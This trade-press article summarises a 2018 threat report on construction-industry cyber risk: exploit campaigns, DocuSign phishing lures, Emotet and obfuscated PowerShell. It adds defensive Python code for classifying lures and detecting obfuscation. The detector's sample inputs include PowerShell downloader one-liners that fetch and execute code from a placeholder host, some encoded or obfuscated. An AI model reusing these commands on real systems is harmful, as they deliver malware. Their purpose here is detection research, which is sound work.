Why Construction Is Vulnerable to Cyberattacks

by Marla McIntyre | Jan 10, 2019

Construction is one of the top five industries most vulnerable to cyberattacks, largely because of outdated internal systems. It also ranks first for confirmed phishing attacks, driven by lures that impersonate DocuSign, the service contractors use for digital invoices and quotes.

According to eSentire’s 2018 Second Quarterly Threat Report, construction is in the top five industries vulnerable to cyberattacks due to outdated internal systems.

In order of vulnerability, biotechnology, accounting, real estate, marketing and construction experienced the most cyberattacks. These industries may not be updating their systems for fear that an update will change or break something, because they are unaware that a patch is needed, or because they underestimate the consequences of failing to patch. The attackers may be trying to drive ad revenue or to recruit compromised servers into their own attack infrastructure.

Figure 1 Top five industries experiencing verified hostile traffic.

During the quarter, eSentire observed successful exploitation, including Drupalgeddon2 (CVE-2018-7600) and EternalBlue (MS17-010) intrusions, resulting from misconfigurations or the absence of routine patching. There was also an increase in phishing attacks that used shipping invoice lures.

EXPLOIT CAMPAIGNS

eSentire identified a massive uptick in attacks against Microsoft Internet Information Services (IIS), from 2,000 in Q1 2018 to 1.7 million in Q2 2018, and expects them to continue into Q3 2018. According to Shodan, 3.5 million IIS web servers were exposed to the internet, largely hosted by Tencent and Alibaba, both Chinese cloud providers.

Drupal and Oracle WebLogic web technologies also experienced increased attacks. Attacks against IIS and WebLogic likely originate from infrastructure that contains a large number of compromised Apache servers, among other publicly exposed servers.

Construction experienced a large number of Drupalgeddon2 attacks. All five of the top industries saw a larger share of information-gathering events (scans) than other industries, further indicating a more exposed threat surface. Another web exploit common to all of these industries was the Apache Struts OGNL expression injection (CVE-2017-5638), which was highest in accounting services. This exploit gained popularity following its use in the 2017 Equifax breach.

Phishing

Construction experienced the largest number of confirmed phishing attacks, largely attributable to lures impersonating DocuSign, which contractors use for digital invoices and quotes.

Figure 2 Phishing Lures Used Across Industries

Figure 3 Quarter over quarter change in lures used for phishing

Employees are most likely to click on phishing links Tuesday through Thursday. They are less likely to click links, and less likely to submit credentials, on Friday, probably a result of diminishing productivity near the weekend.

Figure 4 Distribution of phishing clicks (left) and credential submission (right) throughout the workweek. Percentages represent what fraction of all phishing incidents took place on that day

MALWARE

Malicious Document Lures

Figure 5 Popular lures for malicious documents

Construction ranks fourth in malware events. Emotet is a sophisticated malware family popular with criminal operators. Forty-nine percent of Emotet samples included "invoice," "payment" or "account" in their filename. Documents that fit no named lure category often had filenames consisting only of random strings of numbers and letters; the context for these documents was likely in the body of the email used to deliver them. A small number (2 percent) of Emotet documents were disguised as IRS forms. For Emotet's competitor, Hancitor, fax documents were the popular lure (25 percent).

Malicious documents (such as .pdf and .doc files) are ordinary file formats modified to carry a malicious payload, typically a macro or embedded script that downloads and runs the malware. Download and execution may require only that the document be opened (and, for macro-based lures, that the user enable content). Most malicious documents arrive at an organization through email spam but can sometimes be downloaded from malicious websites.
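As an added illustration (not code from eSentire's report or this article), the Python below classifies attachment filenames taken from constructed mail-gateway log lines into the lure families named above, and handles the case the report calls out where the filename is only a random string and the lure lives in the message body. The log line format, the keyword patterns, the document-extension list and the "random string" rule are this example's own assumptions.

```python
import re
from collections import Counter

# Document types that commonly carry macro or script payloads (example's own list).
DOC_EXTENSIONS = {".doc", ".docm", ".docx", ".xls", ".xlsm", ".xlsx", ".rtf", ".pdf"}

# Lure families named in the report; the patterns are this example's assumptions.
# "irs" and "fax" are anchored so that stems like "firstquarter" or "efax" do not match.
LURE_PATTERNS = {
    "financial": re.compile(r"invoice|payment|account"),
    "tax_form": re.compile(r"(?<![a-z])irs(?![a-z])"),
    "fax": re.compile(r"(?<![a-z])fax(?![a-z])"),
    "shipping": re.compile(r"shipping"),
}

# A stem of 8+ alphanumerics mixing letters and digits (e.g. "g7kq29xtz4"): such
# names carry no lure of their own; the context is in the mail body instead.
RANDOM_STEM = re.compile(r"^(?=.*[a-z])(?=.*\d)[a-z0-9]{8,}$")

# Field layout of the constructed gateway log below (not a real product format).
ATTACH_FIELD = re.compile(r'attach="([^"]+)"')

# Constructed sample log lines; addresses use reserved example domains.
MAIL_LOG = """\
2018-06-12T09:14:03Z from=ap@supplier.example subject="Invoice 4471 past due" attach="Invoice_4471.doc"
2018-06-12T09:20:41Z from=hr@corp.example subject="Q2 headcount" attach="headcount_q2.xlsx"
2018-06-12T10:02:17Z from=efax@mailer.example subject="New fax received" attach="FAX-20180612.pdf"
2018-06-12T10:45:09Z from=noreply@tax.example subject="Your IRS refund" attach="IRS_Form_Refund.doc"
2018-06-12T11:03:55Z from=shipping@logistics.example subject="Shipping notice" attach="ShippingForm.doc"
2018-06-12T11:30:30Z from=unknown@random.example subject="Document" attach="g7Kq29xTz4.doc"
2018-06-12T12:00:00Z from=legal@corp.example subject="Contract draft" attach="contract_draft_v3.docx"
2018-06-12T12:10:00Z from=bot@spam.example subject="Payment" attach="PAYMENT_ACCOUNT.docm"
"""


def classify_attachment(filename: str) -> str:
    """Map an attachment filename to a lure family, 'random_string', 'unspecified',
    or 'other' for attachments that are not documents at all."""
    name = filename.lower()
    stem, dot, ext = name.rpartition(".")
    if not dot or f".{ext}" not in DOC_EXTENSIONS:
        return "other"
    for family, pattern in LURE_PATTERNS.items():
        if pattern.search(stem):
            return family
    if RANDOM_STEM.match(stem):
        return "random_string"
    return "unspecified"


def tally(mail_log: str) -> Counter:
    """Count lure families across every attachment named in the log."""
    counts: Counter = Counter()
    for line in mail_log.splitlines():
        m = ATTACH_FIELD.search(line)
        if m:
            counts[classify_attachment(m.group(1))] += 1
    return counts


def share(counts: Counter, family: str) -> float:
    """Percentage of all attachments that fell into one family."""
    total = sum(counts.values())
    return round(100.0 * counts[family] / total, 1) if total else 0.0


if __name__ == "__main__":
    result = tally(MAIL_LOG)
    for family, count in result.most_common():
        print(f"{family:14s} {count:3d}  ({share(result, family)}%)")
```

In practice the "random_string" bucket is worth routing to sandbox detonation rather than keyword blocking, since nothing in the filename identifies it; the keyword families can be matched against sender reputation and expected business relationships instead.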

Figure 6 Malware Events Observed across industries

Emotet – A Matured Malware

Emotet was first observed in 2014, functioning as a banking trojan, but has since evolved into a sophisticated and modular malware downloader, typically used to deliver other banking trojans while still retaining its own functionality as a banking trojan. Malicious documents carrying the Emotet downloader are disguised as business-critical documents, such as invoices, shipping forms and IRS tax forms.

Emotet spreads to internal systems through additional phishing emails sent from compromised mailboxes and by enumerating SMB shares and brute-forcing credentials. Organizations that leave SMB open between workstations, use simple passwords or reuse passwords across services are susceptible to Emotet propagating across their network. Even when passwords are not successfully guessed, the brute-force behavior can trigger account lockouts. Emotet is considered a serious, sophisticated and ongoing threat. The best defense starts with user awareness around email attachments and links, backed by the technical controls below.

Protecting Against Emotet

To mitigate worming, restrict SMB communications between systems on the network via Group Policy or in the configuration of host-based intrusion prevention systems (HIPS). For example, deploy a group policy that blocks inbound client-to-client SMB connections (TCP port 445) on workstations, which rarely need to serve SMB to one another.
To mitigate spread through automated phishing, block known malspam indicators (including subject lines, body text, sender domains and IP addresses) at the email security gateway.

The principle of least privilege is a general security best practice with implications beyond Emotet. Ensure that each user has only the permissions required to do their job and that administrative privileges are restricted to designated administrative personnel.

Reputation Blocks Across Industry

Reputation blocks, built into the security services that front an organization's internet connections, keep harmful material out of email, warn about phishing attempts and keep malware off the network. A block occurs when a known-bad IP address is detected attempting to connect to a monitored client. Most of these IPs earn their negative reputation through opportunistic scanning and exploitation attempts, so reputation block volume serves as a proxy for industry exposure and can also indicate some degree of targeting. Construction, for example, has a large threat surface.

Figure 7 Reputation Blocks observed in Q2

EXPLOIT CAMPAIGNS

PowerShell is a popular execution technique, and obfuscated malicious PowerShell commands increased 50 percent in Q2 2018. Intrusion attempts made up a large portion of the attacks eSentire observed; most targeted commonly used web technologies, such as IIS (30 percent), WebLogic (24 percent) and Apache (less than 1 percent). A high volume of exploit attempts does not typically indicate that one industry is targeted over another. Rather, it reflects that industry's exposure to opportunistic attacks.

Most IIS exploit attempts were coupled with attempts against Oracle’s WebLogic service (CVE-2017-10271). It is unclear whether these exploit campaigns were related to cryptomining.

The second quarter of 2018 was host to many exploit campaigns, with some indication that the Muhstik botnet played a role in the Drupalgeddon2, WebLogic and GPON router exploits. While numerous Apache Struts and PHP web server attempts were scattered throughout the quarter, four main exploits were observed, targeting IIS, Drupal and WebLogic servers as well as GPON routers.

Attack Infrastructure for WebLogic and IIS Exploits

Launching attacks from compromised hosts reduces the effectiveness of reputation-based controls and complicates attribution by threat researchers. eSentire investigated the attacking infrastructure using Shodan's historical records.

Throughout Q2 2018, eSentire observed IIS and WebLogic attacks originating from servers hosting Apache, RDP, SQL, IIS and HTTP API services. Most of the records included known potential vulnerabilities based on server software version. Vulnerability records for attacking servers showed a steady increase. The majority of this growth appeared to come from Apache HTTP Servers, version 2.4.23. In the same period, records reporting vulnerabilities in IIS 7.5 and HTTP Server 2.4.10 appeared to diminish.

Besides the top five servers, there was an interesting collection of operating systems among the attacking infrastructure involved – more than 400 of the attacking IPs had Shodan records indicating they were Windows machines (including XP, 7, 8, 2008, and 2012). Additionally, nearly 350 FTP servers and more than 100 mail servers were reported; there also were VPN servers, MikroTik devices (reported as bandwidth-testing servers), Kangle, Squid, Jetty, and a handful of lesser-known web service technologies.

In the first quarter of 2018, Recorded Future reported a combination of compromised MikroTik, Apache, and IIS devices performing DDoS attacks as part of a Mirai botnet. It is conceivable that several botnets played a role in exploit campaigns observed over the second quarter. The tendency for threat actors to compromise and recruit any available devices is a recent trend that increases the resiliency of the botnet’s infrastructure against takedowns. Automation of compromise procedures helps the botnet maintain growth, therefore sustaining high attack volumes.

The severity of credential theft often relates to what services’ credentials were compromised and how integrated the service is with the victim business. For example, theft of Facebook credentials is more likely to affect an employee’s personal life than disrupt business functions, but theft of DocuSign or Dropbox credentials could have serious impact on a business. When credentials are reused for multiple accounts in an organization or service, compromise of those credentials can have even more severe implications.

ENDPOINT EVENTS

Figure 8 Different techniques observed in attacks on endpoints

Not surprisingly, endpoint solutions detected a large volume of Emotet malware, but malicious PowerShell scripts constituted the majority of events. Because Emotet uses PowerShell, some of the PowerShell detections are likely the result of Emotet. Use of obfuscated PowerShell commands increased 50 percent from the previous quarter, partly due to Emotet.

Endpoint solutions facilitate observation of execution, evasion and persistence tactics. Among execution tactics, the most common technique observed was PowerShell at 32 percent, followed by VBA scripting at 21 percent. Abusing trusted, signed Windows binaries such as mshta.exe and regsvr32.exe was also popular. Of the PowerShell-based attacks observed, 83 percent used obfuscated command lines in an attempt to hide their intent.

Obfuscated PowerShell

Overall use of PowerShell held steady, but tactics employed by malware continue to evolve. Observations of malicious PowerShell in Q2 2018 showed a slight decrease in unique PowerShell commands (48 in Q1 versus 44 in Q2) and a corresponding 2 percent decrease in obfuscation techniques. About half of malicious PowerShell events tend to utilize command obfuscation. The use of multiple obfuscation tactics in each event increased 20 percent, demonstrating increased sophistication over the previous quarter.

Among the techniques observed, character arrays, string joins and SecureString-to-BSTR conversion increased for the quarter. The split technique was not observed in Q1, but five instances were captured in Q2. Encoded commands, invoked expressions and stream compression were on the decline.
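As an added example that is not part of the eSentire report or this article, the Python below applies regex heuristics for the seven obfuscation techniques named above to PowerShell command lines of the kind collected from Sysmon process-creation events or PowerShell script block logging (event ID 4104), and produces the per-event metrics the report tracks: whether an event is obfuscated, how many stack two or more techniques, and how often each technique appears. The patterns and the sample command lines are constructed for this example and are not eSentire's detection logic; the -EncodedCommand payload is decoded and re-scanned so that a nested technique, such as an encoded wrapper around an iex downloader, is counted.

```python
import base64
import re
from collections import Counter
from typing import Dict, List, Optional

# Regex heuristics for the seven techniques named in the report (this example's own
# patterns). Case-insensitive because PowerShell keywords and .NET member names are.
TECHNIQUES: Dict[str, re.Pattern] = {
    "char_array": re.compile(r"\[char\[\]\]|\[char\]\s*\d+|\(\s*\d{1,3}(?:\s*,\s*\d{1,3}){3,}\s*\)", re.I),
    "string_join": re.compile(r"-join\b|\[string\]::join\(", re.I),
    "securestring_bstr": re.compile(r"SecureStringToBSTR|ConvertTo-SecureString|PtrToString(?:Auto|BSTR|Uni)", re.I),
    "split": re.compile(r"-split\b|\.split\(", re.I),
    # -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob, or an explicit decode call
    "encoded_command": re.compile(r"(?:^|\s)-e[a-z]*\s+[A-Za-z0-9+/=]{16,}|FromBase64String", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "stream_compression": re.compile(r"DeflateStream|GZipStream|IO\.Compression", re.I),
}
ENCODED_FLAG = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind an -EncodedCommand style flag, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def detect_techniques(cmdline: str) -> List[str]:
    """Sorted names of the obfuscation techniques present in one command line. The
    encoded payload, if any, is decoded and scanned too, so an -enc wrapper around
    an iex downloader counts as two techniques."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text = f"{cmdline}\n{decoded}"
    return sorted(name for name, pat in TECHNIQUES.items() if pat.search(text))


def summarize(cmdlines: List[str]) -> Dict[str, object]:
    """Aggregate the metrics the report tracks across a batch of events."""
    per_event = [detect_techniques(c) for c in cmdlines]
    return {
        "events": len(cmdlines),
        "obfuscated": sum(1 for t in per_event if t),
        "multi_technique": sum(1 for t in per_event if len(t) >= 2),
        "technique_counts": Counter(name for t in per_event for name in t),
    }


# Constructed samples. The encoded payload is built here so the base64 is exact;
# the URL uses the reserved .invalid TLD.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')".encode("utf-16-le")
).decode()

SAMPLE_CMDLINES = [
    # benign administrative use: no obfuscation
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
    r'powershell -NoProfile -Command "Get-ChildItem C:\Users | Measure-Object"',
    # plain downloader: a single technique (Invoke-Expression)
    '''powershell -nop -c "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"''',
    # Emotet-style: -EncodedCommand hiding an iex downloader (nested technique)
    f"powershell.exe -NoP -W Hidden -Enc {ENCODED_PAYLOAD}",
    # character array rebuilt with -join
    '''powershell -nop -w hidden -c "$c=[char[]](105,101,120,32,36,97);-join $c"''',
    # SecureString-to-BSTR decryption fed to iex
    '''powershell -w hidden -c "$s='76492d1116743f0423413b16050a5345MgB8AEcA'|ConvertTo-SecureString -key (1..16);iex ([Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($s)))"''',
    # cmdlet name assembled by splitting and re-joining
    '''powershell -c "$p=('Invoke!Expression' -split '!') -join '-'; & $p 'whoami'"''',
    # base64 plus gzip stream decompression piped into iex
    '''powershell -c "iex (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAAAAAAAA'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()"''',
]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(detect_techniques(cmd) or "clean", "<-", cmd[:70])
    print(summarize(SAMPLE_CMDLINES))
```

The technique list per event, rather than a single obfuscated/clean verdict, is what lets a detection team track the "multiple obfuscation tactics per event" trend the report describes; pairing the heuristics with script block logging also catches payloads that only appear after the outer layer is decoded at runtime.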

Author

  • Marla McIntyre

    Marla McIntyre is a digital editor of CE This Week and ConstructionExec.com. She edited Construction Executive's Tech Trends and Risk Management eNewsletters and is the author of more than 200 articles and publications, including Construction Executive's annual technology predictions, the Technology & Software Rundown column and an award-winning series for the Risk Management Association. Her extensive construction and risk management background includes stints as executive director of the Surety Information Office and of the American Subcontractors Association of Metro Washington.
